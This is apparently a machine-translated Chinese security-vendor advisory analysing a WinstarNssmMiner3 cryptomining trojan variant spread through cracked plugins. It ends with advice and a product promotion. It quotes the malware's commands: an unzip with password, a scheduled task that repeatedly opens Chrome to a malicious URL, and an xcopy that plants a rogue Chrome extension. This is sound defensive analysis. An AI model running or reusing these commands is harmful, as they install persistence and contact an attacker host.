360安全中心近期监测到，WinstarNssmMiner3变种非常活跃，日拦截量超过3万次。该木马主要通过各种破解插件传播。建议用户在下载时尽量从官网下载各种软件，不要轻易下载各种来历不明的软件。

2：木马分析

新木马变种不再采用MSI打包，而是采用Inno打包，并将unzip.exe文件重命名为q.exe来伪装自身。

安装包释放文件后，调用q.exe -o -P pwzx aa.zip命令解压木马。

解压后的Uninstall.dll文件是木马DLL的Loader程序。 _locale.nls是加密后的核心木马程序。 Loader会将其解密并加载到内存中执行。

内存decryption_locale.nls退出PE并加载：

解密后的木马被加载到内存中进行挖矿。新木马变种还使用VMP进行代码保护：

然后，与之前的版本类似，木马会添加一个计划任务，以便留在用户的计算机上：

/create /tn '{0621BB95-A70B-9841-162F-62C578D8E38F}' /tr ''C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' http://mod-blog.com/cl/?guid=blo7phv3xl7etbeqpt8xv1yofjgnrxdsprid=1pid=6_1308_5758' /sc 分钟/mo 40 /f

那么Chrome恶意插件也会被添加

%UserProfile%\AppData\Local\Temp\85C2E101\DBBKGILOKAOHNHHEANPIBGKLMHMKNHMM'' %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbbkgilokaohnhheanpibgklmhmknhmm' /e /i /h /c /r /y

插件信息为：

注入svchost.exe进程挖矿，svchost.exe CPU占用极高

木马安装包VT检测情况：

三：安全提醒

近期挖矿木马十分活跃，防不胜防。建议用户及时打系统及第三方补丁，发现电脑卡顿等异常情况时，使用安全软件进行扫描。同时，注意保证安全软件始终处于开放状态进行防御。如果您被诱导、不小心感染，请尽快使用360安全卫士查杀。删除木马

此外，360安全卫士还推出了挖矿木马防护功能。

全面防御多种渠道入侵的挖矿木马。用户开启该功能后，360安全卫士将实时拦截各种挖矿木马攻击，保护用户的电脑安全。

下载地址：